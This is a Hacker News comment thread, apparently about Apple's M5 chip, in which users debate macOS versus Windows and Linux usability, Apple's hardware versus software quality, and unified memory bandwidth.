It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.
BeetleB•4h ago
> If I need a Linux environment, I ssh into a VPS.

I want good window management. Linux gives me a huge number of options. macOS? Not as much.

geodel•5h ago
"Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

7e•4h ago
Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.
KeplerBoy•3h ago
Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.
rowanG077•2h ago
I don't understand. From a pure visual standpoint macOS wins; Linux is not particularly known for looking good or cohesive. But in basically all other matters Linux beats the pants off macOS.
artisin•2h ago
The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.
selectodude•5h ago
That's so wild to me - my personal laptop is still a Mac, but I'm in Windows all day for work. Some of the new direction of macOS isn't awesome, but the basics are still rock solid. Touchpad is perfect, sleep works 100% of the time for days on end, still has UNIX underneath.
MichealCodes•5h ago
The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-Apple machine; many have reported this over the years, but Apple just does Apple. Safari is still atrocious when it comes to web API support. The worst part is, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a Mac mini simply to compile apps via Xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

Edit: Hard to call intentionally preventing support for web APIs a power-user thing. This creates more friction for basic users trying to use any web app.

Edit2: lol Apple PR must be all over this, went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

butlike•5h ago
They said the basics are rock solid (to which I agree). What you're describing, I'd consider a "power user."
foldr•5h ago
Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.
MichealCodes•5h ago
If we dismiss remote management as a non-core feature shouldn't we consider installing a new browser to be advanced usage as well?

I understand that this post is about MacOS, but yes, we are forced to support Safari for iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from MacOS Safari to iOS Safari.

selectodude•5h ago
Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.
MichealCodes•5h ago
Adds hours of battery life at the expense of making your microphone input completely inaudible, due to throttling, if you background the tab it's running on.

On iOS you cannot even keep a web app running in the background. The second they multitask, even with audio/microphone active, Apple kills it. Are they truly adding battery life, or are they cheating by creating restrictions that prevent apps from working?

Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

ahmeneeroe-v2•4h ago
I am in the same boat. I prefer battery life
MichealCodes•3h ago
Breaking things is not extending battery life; battery life assumes functionality. Breaking functionality to extend it is a cop-out, and the break-whatever-you-want behavior could be provided as a mode instead of a one-size-fits-all, we-don't-care-what-breaks approach.
socalgal2•3h ago
If you’re comparing to Chrome, tests show it’s no longer true
astrange•3h ago
Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".
MichealCodes•3h ago
Nice strawman. The core of web APIs is about opening up lower-level functionality to the sandboxed, accessible environment of the web. Beyond audio and video I/O, there's great stuff coming with WebGPU and WebNN. Web apps are much safer and much more convenient than downloading an app; well, in theory they could be, if support weren't regularly sabotaged to protect a corporate interest in walled gardens.
pico303•5h ago
Same boat, and 100% agree. I couldn't find a single example of Windows or Windows software where I think the experience is in any way better. Windows' only saving grace, as a developer, is WSL.

For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there's the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they'd adopted a ribbon interface in their UI "just like Office", and I laughed out loud.

From a hardware perspective, I still don’t understand why Windows and laptop manufacturers can’t get sleep working right. My Intel MacBook Pro with an old battery still sleeps and wakes and lasts for several hours, while my new Windows laptop lasts about an hour and won’t wake from hibernate half the time without a hard reboot.

I think Windows is "good enough" for most people.

BeetleB•4h ago
> I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

While overall I may say MacOS is better, I would not say it's better in every way.

Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

robenkleene•1h ago
> I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

Did you try Keyboard Maestro? https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey, and I'd be super curious whether there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece; it's hard to imagine it being any better.)

Also, I think this statement needs a stronger defense, given macOS includes Shortcuts, Automator, and AppleScript. I don't know much about Windows automation, but I've never heard of them having something like AppleScript (that can, say, migrate data between applications without using GUI scripting [e.g., iterate through open browser tabs and create todos from each of them, operating directly on the application data rather than scripting the UI]).

prewett•3h ago
> Windows only saving grace, as a developer, is WSL.

So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

dboreham•2h ago
Also the control key works.
simonh•1h ago
Just enable space bar heating.
jpalawaga•3h ago
Mac also can't get sleep right. Have you tried to make a MacBook consistently stay 'awake' when the lid is closed?

You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level that the flexibility to run something in clamshell mode is broken, even when using Caffeine/Amphetamine/etc.

So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff, just acknowledge that there WAS a tradeoff made.

cyberpunk•2h ago
Counter-example: I ran an Air without a monitor connected for years using Caffeine; it worked perfectly for me.
strbean•3h ago
> And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

Oh god, I'm going to have to bite the bullet and switch to 11, huh?

The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

oritron•5h ago
> the basics are still rock solid

A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

simonask•5h ago
It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

It’s not even close.

oritron•4h ago
I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

robenkleene•1h ago
> I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

I don't find your original anecdote convincing:

> A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after? E.g., file-system operations? GUI search? How much do they know about how Mail app stores message (e.g., I used to try understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are you syncing mail messages, e.g., using native IMAP, or whatever Gmail uses, or Exchange? What's the email backend?

E.g., without deeper evidence this sounds more like a mail-message indexing issue than a mail-messages-stored-on-disk issue (in 2025, I'd personally have zero expectations about how Mail manages messages on disk; I'd expect local storage of messages to be dynamically managed, since most applications that aren't document-based use a combination of cloud functionality and local caching; e.g., found this in a quick search https://apple.stackexchange.com/questions/471801/ensure-maco...), but if you have stronger evidence I'd love to hear it. But as presented, you're extrapolating much stronger conclusions than are warranted by the anecdote, in my opinion.

afandian•4h ago
I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of wifi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.
philsnow•2h ago
> But I’ve certainly never struggled with getting WiFi to work on a Mac

I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

> or struggled with getting it to sleep/wake

My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).

sofixa•4h ago
> sleep works 100% of the time for days on end

In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

> the basics are still rock solid

The basics like the OS flat out refusing to provide you any debugging information on anything going wrong? It's rock solid alright. I had an issue where occasionally I would get the error "a USB device is using too much power, try unplugging it and replugging it." Which device? Why the hell would Apple tell you that, where is the fun in that?

Key remapping requires installing a keylogger, and you can't have a different scroll direction for the mouse and the touchpad. There still isn't window management, which for the sizes of modern monitors is quite constraining.

> still has UNIX underneath

A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and it turns out that Apple has decided that libraries can only be loaded from a number of authorised locations, which can only be accessed while installing an application. You can't just use a dynamic library you're linking to; it has to be part of a wider install.

carlosjobim•3h ago
> Key remapping requires installing a keylogger

You can remap with config files: https://hidutil-generator.netlify.app

eitally•4h ago
I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was, and it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook as was pretty content.

Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

qwertytyyuu•5h ago
These days I'd rather have a MacBook running Windows than macOS running on a standard Windows laptop of the same form factor, purely for the efficiency of Apple Silicon.
floam•1h ago
It wouldn’t be so power efficient anymore.
lenkite•5h ago
Windows would have beaten macOS if Microsoft had just done one small, teeny-weeny thing: left the OS alone after Win 10.
xedrac•4h ago
I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.
leptons•2h ago
It depends on what you mean by "beat". Windows has a vastly larger market share than Apple ever has, or ever will.
dysoco•52m ago
Oh, but they absolutely did beat macOS. The number of people who give a damn about UI polish, response times, etc. is insignificant to them.

They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

lotsofpulp•4h ago
Seeing my wife have to deal with BSODs, tedious restarts for Windows updates, and myriad issues just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

Not once in 10 years have I had to troubleshoot while she uses her personal macOS machine, but a Dell Latitude laptop in 2025 still can't just "open lid, work, close lid".

And it’s slower. And eats more battery.

klooney•3h ago
Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.
foobarian•33m ago
To me it's not a macOS vs. Windows thing. It's a hardware build quality thing for sure, but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result, Apple's product will inevitably be better than those without such an organizational backbone.

Quoth the Tao of Programming:

8.4

Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

Software and Hardware, ashamed, returned to their homes.

larodi•3h ago
Curiously, every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms of price/value ratio for current ML pipelines. But Apple does not have a server line, which seems to be a massive problem for their products, even though they actually compete with Nvidia in the consumer market, which is a very substantial position, software or not.

AMD was also lagging with drivers, but now we see OpenAI swearing they're going to buy loads of their products, which so many people were not in favor of just 5-7 years ago.

tantalor•5h ago
Been like that since 1977
mcv•5h ago
I want this hardware available for other systems.
makeitdouble•5h ago
That won't happen for now:

https://arstechnica.com/gadgets/2023/08/report-apple-is-savi...

Apple's chip engineering is top tier, but money also buys them a big head start.

ksec•5h ago
The modern ARM C1 Ultra core is only 10% slower than the M5, likely even less when you factor in system-level cache and memory. So the gap isn't as wide as most people think it is.
hamdingers•2h ago
What laptops is that chip featured in?
samwillis•5h ago
Software is very easy to bloat: it expands in scope and grows to do more than is really needed, or apps get released and then forgotten about.

Hardware is naturally limited in scope due to manufacturing costs and doesn't "grow" in the same way. You replace features and components rather than constantly adding to them.

Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pare it down to something manageable and sustainable.

pxc•5h ago
> pare down products and features

macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

coredog64•5h ago
I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

(I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

panick21_•5h ago
If you think hardware can't bloat, I suggest you look into the history of Intel's attempts to replace x86. Or the VAX. Not to mention the tons of minicomputer companies who built ever more complex minis. And not to mention the supercomputer startup bubble.
6SixTy•2h ago
macOS has like no features already, and they keep removing more.
foofoo12•5h ago
It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

elicash•5h ago
For Vision Pro, the software team has been impressive, and has arguably outperformed the hardware team.

But this is the exception.

thomascgalvin•5h ago
> The modern Apple feels like their hardware teams way outperforming the software teams.

There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

butlike•5h ago
There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient of improvements, rather than the earth-shattering announcements of yore (such as the advent of popular cellular phones).

scbzzzzz•5h ago
True. I would like to hijack this thread to discuss what we want from software that isn't present yet. For me, all I can think of is on-device AI/ML (photo editing, video editing, etc.), and not the kind the current companies are trying so hard to shove down our throats.

Maybe Steve was right: we don't know what we want until someone shows it to us.

throw_this_one•5h ago
Their software is literally falling apart. iOS 26 was the biggest trash I've ever experienced from a company this big.
vuggamie•5h ago
I'm old enough to remember Windows CE phones crashing during phone calls.
pivo•5h ago
How so? Seriously asking because it works fine for me.
throw_this_one•4h ago
Buggy. Random slowness in the UI, dropping well below 120Hz. Massive battery drain for no reason. UI elements just looking out of place: big print, in random places.

The UI itself is supposedly intensive to render to some degree. That's crazy, because most of the time it looks like an Android skin from 2012.

And on top of this all -- absolutely nobody asked for this. No one asked for some silly new UI that is transparent or whatever.

lijok•2h ago
Sounds like an experience problem
eloisant•5h ago
Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.
steve1977•4h ago
Google has always been an advertising company.
CharlesW•3h ago
> Apple have always been a hardware company…

Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

kace91•5h ago
There are talks of the hardware head replacing Cook.

Hopefully that will bring whatever they’re doing right to other teams.

butlike•5h ago
I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.
thewebguyd•4h ago
Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.
markus_zhang•5h ago
I pretty much see the Macbook as a fancy toy with mediocre software. Maybe the kernel is solid, but the other software is very meh, even compared to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is system programming, so naturally a Linux box is more suitable.

Biggest grief with MacOS software:

- Finder is very mediocre compared to even File Explorer in Windows

- Scrollbar and other UI issues

Unfortunately I don't think Asahi is going to catch up, and Macbooks are so expensive, so I'll probably keep buying second-hand Dell/Lenovo laptops and dumping Linux on top of them.

lou1306•5h ago
What makes the Mac great is/was the ecosystem of 3rd-party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "loud", which... may become a problem.

I still agree that second-hand ThinkPads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

markus_zhang•5h ago
I have to admit, every time I looked into screenshots of earlier Macs, like the 68K and PPC ones, I felt I loved the UI and such. I even bought a PPC laptop (I think it's a maxed out iBook with 1.5GB of RAM) to tinker with PPC assembly.

But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI was better.

prewett•1h ago
Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The featureset, though, was limited. Managing extensions was clunky, and until MacOS 10, applications had a fixed amount of RAM they could use, which could be set by the user, but which was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system error bomb icon was classic, the sad-Mac boot-failure icon was at least consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

Sohcahtoa82•4h ago
> - Finder is very mediocre compared to even File Explorer in Windows

It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (ie, /bin, /etc) without having to memorize some esoteric key combination?

For fuck's sake, even my home directory is hidden by default.

> - Scrollbar and other UI issues

Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

For years, you couldn't even disable mouse acceleration without either an esoteric command line or 3rd-party software. Even now, you can't disable scroll-wheel acceleration. I hate that I can't just get a consistent "one click = ~2 lines of text" behavior.
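
For the record, the esoteric incantations in question look roughly like this (from memory, so treat it as a sketch -- behavior varies by macOS version, and you may need to restart Finder or log out first):

  # Show hidden files and folders (/bin, /etc, ~/Library, ...) in Finder
  defaults write com.apple.finder AppleShowAllFiles -bool true
  killall Finder

  # Disable mouse pointer acceleration
  defaults write -g com.apple.mouse.scaling -1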

I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

kemayo•3h ago
> Why the hell is there no key to delete a file?

Command + backspace.

cmiller1•3h ago
> Why the hell is there no key to delete a file?

Cmd+delete? I don't really want it to be a single key as it's too easy to accidentally trigger (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name)

dd_xplore•1h ago
You know IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps), it comes mainly from the software.

MacOS doesn't have enough 'openness' to it. There's no debug information, there's a lack of tools, etc. To this day I could still daily drive an XP or 98/2000 machine (if it supported the modern web) because all the essentials are still intact. You can look around the system files, customize them, edit them. I could modify game files to change their behaviour. I could modify the Windows registry in tons of ways to customize my experience and experiment with lots of things.

As a 'Pro' user my first expectation is options, options in everything I do, which MacOS severely lacks.

All the random hardware that we see launching from time to time has drivers for Windows but not for Mac. Even Linux has tons of terminal tools and customisation.

MacOS is like a glorified phone OS. It's weirdly locked down in certain places that drive you crazy. Tons of things do not have context menus (Windows is filled with them).

Window management sucks, and there's no device manager! Not even CLI tools! (Or maybe I'm not aware?) Why can't I simply cut and paste?

There's no API/way to control system elements via scripting; Windows and Linux are filled to the brim with these! Even though the UI is good-looking, I just cannot switch to an Apple device (both Mac and iPhone) for these reasons. I bought an iPad Pro and I'm regretting it. There's no Termux equivalent on iPadOS/iOS; there are some terminal tools, but they can't use the full processing power, they can't multi-thread, and they can't run in the background. It's just ridiculous. The iPad Pro is just a glorified iPhone. Hardware doesn't make a device 'Pro'; software does. Video editing isn't a 'Pro' workflow in the sense that it can be done on any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today; does that make the Air a 'Pro' device? No!

astrange•1h ago
> As a 'Pro' user my first expectation is options, options in everything I do, which MacOS severely lacks.

It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

https://limi.net/checkboxes

> Window management sucks

I'm always mystified reading these kinds of posts on HN because it literally always turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

> there's no device manager! Not even CLI tools!

`ioreg -l` or `system_profiler`. Why does this matter?

> There's no API/way to control system elements via scripting

https://developer.apple.com/library/archive/documentation/Ac...

https://developer.apple.com/documentation/XCUIAutomation

https://en.wikipedia.org/wiki/AppleScript

https://support.apple.com/guide/shortcuts/welcome/ios

BeFlatXIII•47m ago
> Why the hell is there no key to delete a file?

Command+Backspace.

nabla9•4h ago
Doing a good job is rewarded.

Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

utf_8x•4h ago
Interesting, I thought the next in line was Craig Federighi
wslh•4h ago
I've been wondering whether it would be a reasonable move for Apple to launch a cheaper secondary brand -- one that offers devices capable of running Linux or Windows -- to reach a broader market without cannibalizing its own.
dawnerd•4h ago
Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.
JKCalhoun•4h ago
There has to be a whole different mindset with hardware though. Every change has to necessarily be more considered, cross-checked. And I don't say this in any way to disparage software engineers (hold up hand) but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)
SCdF•4h ago
I don't think it's the modern Apple, I think that's just Apple.

I remember using iTunes when fixing the name of an album was a modal, blocking operation that had to write to each and every MP3, one by one, in the slowest file-metadata update I have ever experienced. Give me a magnetised needle and a steady hand and I could have done it faster.

A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

robenkleene•2h ago
Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

bigyabai•15m ago
Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

SCdF•11m ago
Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

I also think you're confusing what I wrote. It's not a competition.

I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

[1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, the jury is clearly out

7e•4h ago
Apple relies heavily on H-1B slave labor. They don't pay their software teams enough to be competitive, and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound-foolish.
whitehexagon•4h ago
I dunno, didn't they already crack 400GB/s memory bandwidth some years ago? This seems like just another small bump to handle the latest OS effects sludge.

Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clockwork, MBA-driven trickle of slightly better, over-hyped future eWaste.

To outperform during this crisis, hardware engineers worth their salt need to be designing long-lived boxes with internals that can be easily repaired or upgraded. "Yeah, but the RAM connections are fiddly." Great, now that sounds like a challenge worth solving.

But you are right about the software. Installing Asahi makes me feel like I own my computer again.

astroflection•4h ago
https://asahilinux.org/

"Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

Why the "®" after Linux? I think this is the first time I've seen this.

utf_8x•4h ago
The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...
tyrellj•4h ago
This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (boot loaders, Linux kernel support, etc). Particle released a really cool dev board recently, but the software is lacking. Qualcomm also struggled with poor support on their new CPU launch. And it sometimes takes a while for new Intel processor features to be supported in the toolchains and kernel, and then to get used in software.

Aside from that, I think of Apple as a hardware company that must write software to sell its devices. Maybe this isn't true anymore, but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task, either.

amelius•3h ago
Yes. And their consumer teams are way outperforming their business teams.
oofbey•3h ago
In a sense, hardware's job is easier because the goals are clearer: make it faster and more power efficient. There are vast amounts of complexity within those goals, but try summarizing the north-star vision for a complex software project like an OS anywhere near as simply as that.
mproud•3h ago
The hardware team has always shined, but how about one example of this:

The PowerBooks of the mid-1990s were hugely successful, especially the first ones, which were notable for what we now take for granted: pushing the keyboard back to allow space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. Yet even as the '90s roared on, Apple was languishing, looking for a modern OS.

crazygringo•2h ago
Apple is a hardware company. This has always been the case. It's not just the modern Apple.
gloosx•1h ago
From my vast experience with MacOS, Apple is notoriously bad at the most basic software, like Notes or Calculator.
textlapse•1h ago
It does feel like Apple is firing on all cylinders for their core competencies.

Software (iOS 26), services (Music/TV/Cloud/Apple Intelligence), and marketing (just keep screaming "Apple Intelligence" for 3 months, then scream "Liquid Glass"), on the other hand, seem like they are losing steam or being very reactive.

No wonder John Ternus is widely anticipated to replace Tim Cook (and not Craig).

throwaway48476•6h ago
No M5 mac mini?
randomtoast•6h ago
A unified memory bandwidth of 1,224 gigabits per second is quite impressive.
vardump•6h ago
Probably gigabytes (GB) and not gigabits (Gb)?

Edit: gigabits indeed. Confusing, my old M2 Max has 400 GB/s (3200 gigabits per second) bandwidth. I guess it's some sort of baseline figure for the lowest end configuration?

Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.
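
A quick sanity check on the unit conversion (the Max/Ultra multiples above are pure guesswork):

  # gigabits -> gigabytes: divide by 8
  echo $((1224 / 8))   # 153 GB/s for the base M5
  echo $((153 * 4))    # 612 GB/s for a hypothetical 4x-wide Max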

mihau•6h ago
Why? The M3 Ultra already had 800 GB/s (6,400 Gbps) of memory bandwidth.
NetMageSCW•6h ago
But what did the base M3 have? Why compare across different categories?

Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

sapiogram•6h ago
And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.
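
Back-of-the-envelope, assuming DDR5-6400 and two 64-bit channels:

  # MT/s x bytes per transfer x channels
  echo $((6400 * 8 * 2))   # 102400 MB/s, i.e. ~102 GB/s
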
Aurornis•6h ago
High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

RossBencina•5h ago
Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).
Rohansi•3h ago
And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.
modeless•5h ago
Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.
hannesfur•5h ago
> All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

That’s true for the on-GPU memory but I think there is some subtlety here. MoE models have slimmed the difference considerably in my opinion, because not all experts might fit into the GPU memory, but with a fast enough bus you can stream them into place when necessary.

